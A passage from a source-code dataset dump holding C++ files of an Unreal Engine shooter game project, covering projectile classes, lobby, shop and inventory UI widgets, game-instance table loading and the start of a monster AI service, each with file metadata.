CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"COLLISIONMESHCOMPONENT\"));\n\tCollisionMeshComponent->SetupAttachment(CollisionComponent);\n\tCollisionMeshComponent->OnComponentBeginOverlap.AddDynamic(this, &APG_ProjectileShutgun::OnTargetBeginOverlap);\n}\n\nvoid APG_ProjectileShutgun::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tABCHECK(nullptr != 
CollisionMeshComponent);\n\tCollisionMeshComponent->SetCollisionProfileName(TEXT(\"Projectile\"));\n\tCollisionMeshComponent->SetGenerateOverlapEvents(true);\n}\n\nvoid APG_ProjectileShutgun::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tCollisionMeshComponent->SetVisibility(true);\n}\n\nvoid APG_ProjectileShutgun::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tUpdateCollisionScale(DeltaTime);\n}\n\nvoid APG_ProjectileShutgun::UpdateCollisionScale(float DeltaTime)\n{\n\tif (CollisionMeshComponent)\n\t{\n\t\tm_fScaleTime += DeltaTime;\n\n\t\t// 샷건 범위가 완전히 펴질때까지의 목표시간\n\t\tfloat GoalSec = 0.2f;\n\t\tif (m_fScaleTime > GoalSec)\n\t\t\tm_fScaleTime = GoalSec;\n\n\t\tfloat fScale = (m_fScaleTime / GoalSec);\n\t\tFVector vScale(fScale, fScale, fScale);// = CollisionMeshComponent->GetComponentScale();\n\t\tCollisionMeshComponent->SetRelativeScale3D(vScale);\n\n\t\tif (1.0f <= fScale)\n\t\t{\n\t\t\tDestroy();\n\t\t}\n\t}\n}\n\nvoid APG_ProjectileShutgun::FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon)\n{\n\tABCHECK(nullptr != CollisionMeshComponent);\n\tWeaponData = *pWeaponData;\n\n\tFName CollisionName = bMonsterWeapon ? TEXT(\"Mon_Projectile\") : TEXT(\"Projectile\");\n\tif (CollisionMeshComponent)\n\t{\n\t\tCollisionMeshComponent->SetCollisionProfileName(CollisionName);\n\t}\n\n\tvStartPos = GetActorLocation();\n}\n\nvoid APG_ProjectileShutgun::SetScaleTime(float fScaleTime)\n{\n\tm_fScaleTime = fScaleTime;\n\tUpdateCollisionScale(0.0f);\n}\n\nvoid APG_ProjectileShutgun::OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto OwnerWeapon = Cast<APG_Weapon>(GetOwner());\n\tABCHECK(nullptr != OwnerWeapon);\n\n\t// 몬스터 충돌시\n\tauto AMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (AMonCharacter && IsOwnerMyPlayer())\n\t\tAMonCharacter->OnDamage(OwnerWeapon->GetWeaponAttackDamage());\n\n\t// 플레이어 충돌시\n\tauto AMyCharacter = Cast<APG_MyChar>(OtherActor);\n\tif (AMyCharacter&& IsOwnerMonster())\n\t\tAMyCharacter->OnAttackedByMonster();\n}\n\nvoid APG_ProjectileShutgun::OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tif (false == WeaponData.Collide)\n\t\treturn;\n\n\tDestroy();\n}\n\n" }, { "alpha_fraction": 0.7736085057258606, "alphanum_fraction": 0.7786116600036621, "avg_line_length": 19.766233444213867, "blob_id": "d7b00ed8a822579afc7b1bd9f142c8bdcec581d1", "content_id": "7e59124647066d37c48c4e032060d72592876605", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 79, "num_lines": 77, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetMainLobby.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_UserWidgetMainLobby.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetMainLobby : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\n\nprotected :\n\tvirtual void NativeConstruct() override;\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tFString GetSelectedStageName();\n\n\t// 스테이지 별 획득 UI 갱신\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\n\t// 무기 슬롯 
갱신\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateWeaponSlotLayout();\n\n\t// 인벤토리 슬롯 선택 아이콘 이미지\n\tUFUNCTION(BlueprintCallable)\n\tvoid AllHideIconOpenSlot();\n\tUFUNCTION(BlueprintCallable)\n\tvoid SetEnableIconOpenSlot(int32 nSlotIndex, bool bEnable);\n\npublic :\n\tUFUNCTION(BlueprintCallable)\n\tbool OnNextSelectStage();\n\tUFUNCTION(BlueprintCallable)\n\tbool OnPrevSelectStage();\n\n\tUFUNCTION()\n\tvoid OnBtnClickedWeaponSlot(int32 nSlotIndex);\n\tUFUNCTION()\n\tvoid OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex);\n\nprivate :\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveFlag;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveFlag;\n\tUPROPERTY()\n\tclass UTextBlock* Text_FlagValue;\n\t\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveTime;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveTime;\n\tUPROPERTY()\n\tclass UTextBlock* Text_TimeValue;\n\n\tUPROPERTY()\n\tclass UOverlay* Overlay_ActiveLethal;\n\tUPROPERTY()\n\tclass UOverlay* Overlay_DeActiveLethal;\n\tUPROPERTY()\n\tclass UTextBlock* Text_LethalValue;\n\n\n\tUPROPERTY()\n\tclass UPG_UserWidgetWeaponInventory* WB_WeaponInventory;\n};\n" }, { "alpha_fraction": 0.7253345847129822, "alphanum_fraction": 0.7309368252754211, "avg_line_length": 26.57939910888672, "blob_id": "47ce7aef251c6d9532c9c81058b0576e8db1a38a", "content_id": "8b3d2dbe5cfc63bbcf15a4e1e5988a410a6f4e6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6428, "license_type": "no_license", "max_line_length": 139, "num_lines": 233, "path": "/Source/Project_Gun/Private/Game/GameInstance/PG_GameInstance.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n\nUPG_GameInstance::UPG_GameInstance()\n{\n\tLoadTable();\n}\n\nvoid UPG_GameInstance::Init()\n{\n\tSuper::Init();\n\n\t//PalyStageID = 0;\n\n\tm_kADData.Init(this);\n\tLoadConsoleCommand();\n}\n\nvoid UPG_GameInstance::Shutdown()\n{\n\tm_kConsole.ReleaseCommands();\n\tSuper::Shutdown();\n}\n\nFPGCharacterMovementData* UPG_GameInstance::GetTableCharacterMovementData()\n{\n\treturn m_pCharacterMovementTable ? m_pCharacterMovementTable->FindRow<FPGCharacterMovementData>(*FString::FromInt(0), TEXT(\"\")) : nullptr;\n}\n\nFPGCharacterCameraData* UPG_GameInstance::GetTableCharacterCameraData()\n{\n\treturn m_pCharacterCameraTable ? m_pCharacterCameraTable->FindRow<FPGCharacterCameraData>(*FString::FromInt(0), TEXT(\"\")) : nullptr;\n}\n\nconst FPGWeaponTableData* UPG_GameInstance::GetWeaponTableData(int32 nIndex)\n{\n\treturn m_pWeaponTable ? m_pWeaponTable->FindRow<FPGWeaponTableData>(*FString::FromInt(nIndex), TEXT(\"\")) : nullptr;\n}\n\nconst bool UPG_GameInstance::GetAllWeaponTableData(TArray<const FPGWeaponTableData*>& a_rkWeaponTableDatas)\n{\n\tABCHECK(nullptr != m_pWeaponTable, false);\n\n\tm_pWeaponTable->GetAllRows(TEXT(\"WeaponShopTable\"), a_rkWeaponTableDatas);\n\n\treturn (0 < a_rkWeaponTableDatas.Num());\n}\n\nconst FPGStageData*\tUPG_GameInstance::GetTableStageData(int32 nID)\n{\n\treturn m_pStageTable ? 
m_pStageTable->FindRow<FPGStageData>(*FString::FromInt(nID), TEXT(\"\")) : nullptr;\n}\n\nconst bool UPG_GameInstance::GetAllTableStageData(OUT TArray<const FPGStageData*>& a_rkStageDatas)\n{\n\tABCHECK(nullptr != m_pStageTable, false);\n\n\tm_pStageTable->GetAllRows(TEXT(\"StageTable\"), a_rkStageDatas);\n\n\treturn (0 < a_rkStageDatas.Num());\n}\n\nconst FPGLethalAttackData*\tUPG_GameInstance::GetTableLethalAttackData(int32 nID)\n{\n\treturn m_pLethalAttackTable ? m_pLethalAttackTable->FindRow<FPGLethalAttackData>(*FString::FromInt(nID), TEXT(\"\")) : nullptr;\n}\n\nconst FPGADTableData* UPG_GameInstance::GetADTableData(EADType eADType)\n{\n\treturn m_pADTable ? m_pADTable->FindRow<FPGADTableData>(*FString::FromInt((int32)eADType), TEXT(\"\")) : nullptr;\n}\n\nint32 UPG_GameInstance::GetADRemainTime(EADType eADType)\n{\n\treturn m_kADData.GetRemainReViewableTime(eADType);\n}\n\nbool UPG_GameInstance::IsAbleADView(EADType eADType)\n{\n\treturn m_kADData.IsAbleViewAD(eADType);\n}\n\nvoid UPG_GameInstance::ResetADRemainTime(EADType eADType)\n{\n\tm_kADData.Reset(eADType);\n}\n\nbool UPG_GameInstance::LoadTable()\n{\n#define LOAD_TABLE(Path, Out)\t\\\n{\t\\\n\tFString TablePath = Path;\t\\\n\tstatic ConstructorHelpers::FObjectFinder<UDataTable> DT_Table(*TablePath);\t\\\n\tif (DT_Table.Succeeded())\t\\\n\t{\t\\\n\t\tOut = DT_Table.Object;\t\\\n\t\tABCHECK(Out->GetRowMap().Num() > 0, false);\t\\\n\t}\t\\\n\telse\t\\\n\t{\t\\\n\t\tABLOG(Error, TEXT(\"Can't Find Table : %s\"), *TablePath);\treturn false; \\\n\t}\t\\\n}\t\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Character/CharacterMovementTable.CharacterMovementTable\"), m_pCharacterMovementTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Character/CharacterCameraTable.CharacterCameraTable\"), m_pCharacterCameraTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Weapon/WeaponTable.WeaponTable\"), m_pWeaponTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/Stage/StageData.StageData\"), m_pStageTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/LethalAttack/LethalAttackTable.LethalAttackTable\"), m_pLethalAttackTable);\n\tLOAD_TABLE(TEXT(\"/Game/PG/Tables/AD/ADTable.ADTable\"), m_pADTable);\n\t\n#undef LOAD_TABLE\n\n\treturn true;\n}\n\nbool UPG_GameInstance::LoadConsoleCommand()\n{\n\tABCHECK(m_kConsole.InitConsoleCommands(), false);\n\treturn true;\n}\n\nFString UPG_GameInstance::GetStageName(int32 StageID)\n{\n\treturn FString::Printf(TEXT(\"/Game/PG/Maps/Stage/Stage%d\"), StageID);\n}\n\n//void UPG_GameInstance::StartGame_NextStage()\n//{\n//\tPalyStageID++;\n//\t//StartGame();\n//\n//\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\tif (pGameModeBase)\n//\t{\n//\t\tpGameModeBase->StartGame();\n//\t}\n//}\n//\n//void UPG_GameInstance::RestartGame()\n//{\n//\tFString RestartStageName = GetStageName(PalyStageID);\n//\t//FString DebugMsg = FString::Printf(TEXT(\"Stage Restart : %s\"), *RestartStageName);\n//\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Yellow, DebugMsg);\n//\n//\tUGameplayStatics::OpenLevel(GetWorld(), *RestartStageName);\n//}\n//\n//bool UPG_GameInstance::OnNextSelectStage()\n//{\n//\tint32 nNextStage = PalyStageID + 1;\n//\n//\tif (GetTableStageData(nNextStage))\n//\t{\n//\t\tint32 nBackupPlayStageID = PalyStageID;\n//\t\tPalyStageID = nNextStage;\n//\n//\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\t\tABCHECK(nullptr != pGameModeBase, false);\n//\n//\t\tif (false == pGameModeBase->ChangeSelectStageData(PalyStageID))\n//\t\t{\n//\t\t\tPalyStageID = 
nBackupPlayStageID;\n//\t\t\treturn false;\n//\t\t}\n//\n//\t\treturn true;\n//\t}\n//\n//\treturn false;\n//}\n//\n//bool UPG_GameInstance::OnPrevSelectStage()\n//{\n//\tint32 nPrevStage = PalyStageID - 1;\n//\n//\tif (GetTableStageData(nPrevStage))\n//\t{\n//\t\tint32 nBackupPlayStageID = PalyStageID;\n//\t\tPalyStageID = nPrevStage;\n//\n//\t\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\t\tABCHECK(nullptr != pGameModeBase, false);\n//\n//\t\tif (false == pGameModeBase->ChangeSelectStageData(PalyStageID))\n//\t\t{\n//\t\t\tPalyStageID = nBackupPlayStageID;\n//\t\t\treturn false;\n//\t\t}\n//\n//\t\treturn true;\n//\t}\n//\n//\treturn false;\n//}\n//\n//bool UPG_GameInstance::SetPlayStageID(int32 nPlayStageID)\n//{\n//\tABCHECK(GetTableStageData(nPlayStageID), false);\n//\n//\tPalyStageID = nPlayStageID;\n//\treturn true;\n//}\n\n//bool UPG_GameInstance::StartGame()\n//{\n//\tABCHECK(GetTableStageData(PalyStageID), false);\n//\n//\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n//\tABCHECK(nullptr != pGameModeBase, false);\n//\n//\tauto pSavePlayerData = pGameModeBase->GetSavePlayerData();\n//\tABCHECK(nullptr != pSavePlayerData, false);\n//\n//\tpSavePlayerData->m_nLastPlayStageID = PalyStageID;\n//\tpGameModeBase->SavePlayerData();\n//\n//\tFString NextStageName = GetStageName(PalyStageID);\n//\t//FString DebugMsg = FString::Printf(TEXT(\"Play Stage : %s\"), *NextStageName);\n//\t//GEngine->AddOnScreenDebugMessage(-1, 3.0f, FColor::Red, DebugMsg);\n//\n//\tUGameplayStatics::OpenLevel(GetWorld(), *NextStageName);\n//\n//\treturn true;\n//}\n\nvoid UPG_GameInstance::FromGameModeTick(float DeltaTime)\n{\n\tm_kConsole.UpdateCommands();\n\tm_kADData.Update(DeltaTime);\n}\n" }, { "alpha_fraction": 0.8080691695213318, "alphanum_fraction": 0.8092219233512878, "avg_line_length": 39.348838806152344, "blob_id": "86696d321775460e0606fe15cfb51e08b428fb3d", "content_id": "8e563d47ed008fe695899edec03f4f9e3ad11a85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1791, "license_type": "no_license", "max_line_length": 202, "num_lines": 43, "path": "/Source/Project_Gun/Public/BlueScriptObject/Projectile/PG_ProjectileRifle.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_ProjectileRifle.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_ProjectileRifle : public APG_Projectile\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\tAPG_ProjectileRifle();\n\nprotected:\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void BeginPlay() override;\t// Called when the game starts or when spawned\n\npublic:\t\n\tvirtual void FireInDirection(const struct FPGWeaponData* pWeaponData, const FVector& ShootDirection, bool bMonsterWeapon = false) override;\n\nprotected:\n\tvirtual void OnTargetBeginOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult) override;\n\tvirtual void OnTargetHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit) override;\n\tvirtual void OnPlayEndParticle(UParticleSystemComponent* ParticleSystemComponent) 
override;\n\t\nprivate :\n\t// 오브젝트 Mesh\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUStaticMeshComponent*\tProjectileMeshComponent;\n\n\t// 프로젝타일 무브먼트 컴포넌트\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUProjectileMovementComponent* ProjectileMovementComponent;\n\n\t// 피격시 나타나는 이펙트\n\tUPROPERTY(VisibleAnywhere, BlueprintReadWrite, Category = \"PG ProjectileData\", Meta = (AllowPrivateAccess = true))\n\tUParticleSystemComponent*\tBurstingEffect;\n};\n" }, { "alpha_fraction": 0.7722772359848022, "alphanum_fraction": 0.7739273905754089, "avg_line_length": 22.764705657958984, "blob_id": "923fb70add1b2bb89d48e4fd696713bb0860f183", "content_id": "81ad93a9edcc2c95301d8122b3c90d0d47424182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1214, "license_type": "no_license", "max_line_length": 79, "num_lines": 51, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetMessagePopup.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetMessagePopup.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetMessagePopup::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Text_TitleName);\n\tABCHECK(nullptr != Text_Description);\n\tABCHECK(nullptr != Btn_OK);\n\n\tBtn_OK->OnClicked.AddDynamic(this, &UPG_UserWidgetMessagePopup::OnBtnOK);\n}\n\nvoid UPG_UserWidgetMessagePopup::SetVisibility(ESlateVisibility InVisibility)\n{\n\tSuper::SetVisibility(InVisibility);\n\n\tif (ESlateVisibility::Hidden != InVisibility)\n\t{\n\t\tif (PopupPlaySound)\n\t\t\tPlaySound(PopupPlaySound);\n\t}\n}\n\nvoid UPG_UserWidgetMessagePopup::SetTitle(FString kTitle)\n{\n\tABCHECK(nullptr != Text_TitleName);\n\tText_TitleName->SetText(FText::FromString(kTitle));\n}\n\nvoid UPG_UserWidgetMessagePopup::SetDescription(FString kDescription)\n{\n\tABCHECK(nullptr != Text_Description);\n\tText_Description->SetText(FText::FromString(kDescription));\n}\n\nvoid UPG_UserWidgetMessagePopup::SetValue(int32 nValue)\n{\n\tm_nValue = nValue;\n}\n\nvoid UPG_UserWidgetMessagePopup::OnBtnOK()\n{\n\tOnBtnClickedOK.Broadcast();\n\tOnBtnClickedOK_OneValue.Broadcast(m_nValue);\n}\n" }, { "alpha_fraction": 0.7567567825317383, "alphanum_fraction": 0.7621621489524841, "avg_line_length": 28.854839324951172, "blob_id": "44dd4313abd76a100ed9059eb3333977f488fa32", "content_id": "e5d0fc3a88299fcc046d2c4af5c3f8dc2eaff83e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1852, "license_type": "no_license", "max_line_length": 115, "num_lines": 62, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetWeaponInventory.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetWeaponInventory.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\n#include <Components/Button.h>\n\nvoid UPG_UserWidgetWeaponInventory::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tfor (int32 nIndex = 0; nIndex < eMaxInvenIndex; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = 
FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tif (nullptr == pBtnWeapon)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find widget %s\"), *BtnWidgetName);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpBtnWeapon->OnBtnWeaponClicked_WeaponIndex.AddUObject(this, &UPG_UserWidgetWeaponInventory::OnSelectWeaponIndex);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponInventory::UpdateWeaponInventory()\n{\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase);\n\n\tfor (int32 nIndex = 0; nIndex < eMaxInvenIndex; ++nIndex)\n\t{\n\t\tFString BtnWidgetName = FString::Printf(TEXT(\"WB_WeaponBox_%d\"), nIndex);\n\t\tauto pBtnWeapon = Cast<UPG_UserWidgetWeaponBox>(GetWidgetFromName(*BtnWidgetName));\n\t\tif (nullptr == pBtnWeapon)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find widget %s\"), *BtnWidgetName);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpBtnWeapon->SetWeaponIndex(pGameModeBase, nIndex);\n\t}\n}\n\nvoid UPG_UserWidgetWeaponInventory::SetOpenSlotIndex(int32 nSlotIndex)\n{\n\tm_nOpenSlotIndex = nSlotIndex;\n}\n\nvoid UPG_UserWidgetWeaponInventory::OnBtnClose()\n{\n\tOnBtnClickedClose.Broadcast(m_nOpenSlotIndex, PG_INVALID_INDEX);\n\tm_nOpenSlotIndex = PG_INVALID_INDEX;\n}\n\nvoid UPG_UserWidgetWeaponInventory::OnSelectWeaponIndex(int32 nWeaponIndex)\n{\n\tOnBtnClickedClose.Broadcast(m_nOpenSlotIndex, nWeaponIndex);\n\tm_nOpenSlotIndex = PG_INVALID_INDEX;\n}" }, { "alpha_fraction": 0.7634600400924683, "alphanum_fraction": 0.7667772173881531, "avg_line_length": 30.360000610351562, "blob_id": "61dc5d337dbbd6590bee7fdcabdbea42e6e9590a", "content_id": "2f81600899e674f05d76efaee377df23380434ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3921, "license_type": "no_license", "max_line_length": 104, "num_lines": 125, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetShop.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetShop.h\"\n#include \"UI/PG_UserWidgetShopWeaponBox.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetShop::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\t//ABCHECK(nullptr != Text_ADRemainTime);\n\tPG_WIDGET_LINK(UTextBlock, Text_ADRemainTime);\n\t\n\tm_pBtn_ADView = Cast<UButton>(GetWidgetFromName(TEXT(\"Btn_ADView\")));\n\tABCHECK(nullptr != m_pBtn_ADView);\n\n\tfor (int32 nIndex = 0; nIndex < eMaxWeaponShopItemSlot; ++nIndex)\n\t{\n\t\tFString kWeaponShopBoxWidgetName = FString::Printf(TEXT(\"WB_ShopWeaponBox_%d\"), nIndex);\n\t\tauto pWeaponShopBox = Cast<UPG_UserWidgetShopWeaponBox>(GetWidgetFromName(*kWeaponShopBoxWidgetName));\n\t\tif (nullptr == pWeaponShopBox)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find UserWidgetShopWeaponBox (Index : %d)\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpWeaponShopBox->OnItemBuyWeapon.AddUObject(this, &UPG_UserWidgetShop::UpdateWeaponShopLayout);\n\t}\n}\n\nvoid UPG_UserWidgetShop::NativeTick(const FGeometry& MyGeometry, float DeltaTime)\n{\n\tSuper::NativeTick(MyGeometry, DeltaTime);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != 
pGameInstance);\n\n\tint32 nRemainTime = pGameInstance->GetADRemainTime(EADType::eAT_WeaponShop);\n\tSetADRemainTime(nRemainTime);\n\tSetBtnEnableAD((nRemainTime <= 0));\n\n}\n\nvoid UPG_UserWidgetShop::UpdateLethalShopLayout()\n{\n\n}\n\nvoid UPG_UserWidgetShop::UpdateWeaponShopLayout()\n{\n\tUpdateRewardPoint();\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tfor (int32 nIndex = 0; nIndex < eMaxWeaponShopItemSlot; ++nIndex)\n\t{\n\t\tFString kWeaponShopBoxWidgetName = FString::Printf(TEXT(\"WB_ShopWeaponBox_%d\"), nIndex);\n\t\tauto pWeaponShopBox = Cast<UPG_UserWidgetShopWeaponBox>(GetWidgetFromName(*kWeaponShopBoxWidgetName));\n\t\tif (nullptr == pWeaponShopBox)\n\t\t{\n\t\t\tABLOG(Error, TEXT(\"Can't find UserWidgetShopWeaponBox (Index : %d)\"), nIndex);\n\t\t\tcontinue;\n\t\t}\n\n\t\tpWeaponShopBox->SetWeaponIndex(pGameModeMainLobby, nIndex);\n\t\tpWeaponShopBox->SetSlotIndex(nIndex);\n\t}\n}\n\nvoid UPG_UserWidgetShop::SetBtnEnableAD(bool bEnable)\n{\n\tABCHECK(nullptr != m_pBtn_ADView);\n\n\tif (m_pBtn_ADView->bIsEnabled != bEnable)\n\t\tm_pBtn_ADView->SetIsEnabled(bEnable);\n\n\tif (bEnable)\n\t\tm_pkText_ADRemainTime->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tm_pkText_ADRemainTime->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetShop::SetADRemainTime(int32 nTime)\n{\n\tm_pkText_ADRemainTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetShop::OnADRewardVideoSucessed()\n{\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tint32 nRewardPoint = pGameMode->GetSavePlayerData()->m_nRewardPoint + PG_ADVIEW_SHOP_REWARD;\n\tpGameMode->GetSavePlayerData()->m_nRewardPoint = nRewardPoint;\n\tpGameMode->SavePlayerData();\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\tpMyPlayerState->SetRewardPoint(nRewardPoint);\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_WeaponShop);\n\n\tUpdateWeaponShopLayout();\n}\n\nvoid UPG_UserWidgetShop::OnADRewardVideoClosed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_WeaponShop);\n}" }, { "alpha_fraction": 0.7498349547386169, "alphanum_fraction": 0.7567656636238098, "avg_line_length": 32.30769348144531, "blob_id": "057c2230db6d0ebf006662d48527adbeba8b8411", "content_id": "4b74116fa4875e1e6efcbf00d5fa0711e9a533f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3084, "license_type": "no_license", "max_line_length": 135, "num_lines": 91, "path": "/Source/Project_Gun/Private/AI/BTService_MonDetect.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"AI/BTService_MonDetect.h\"\n#include \"AI/PG_AICon_Mon.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include <BehaviorTree/BlackboardComponent.h>\n#include 
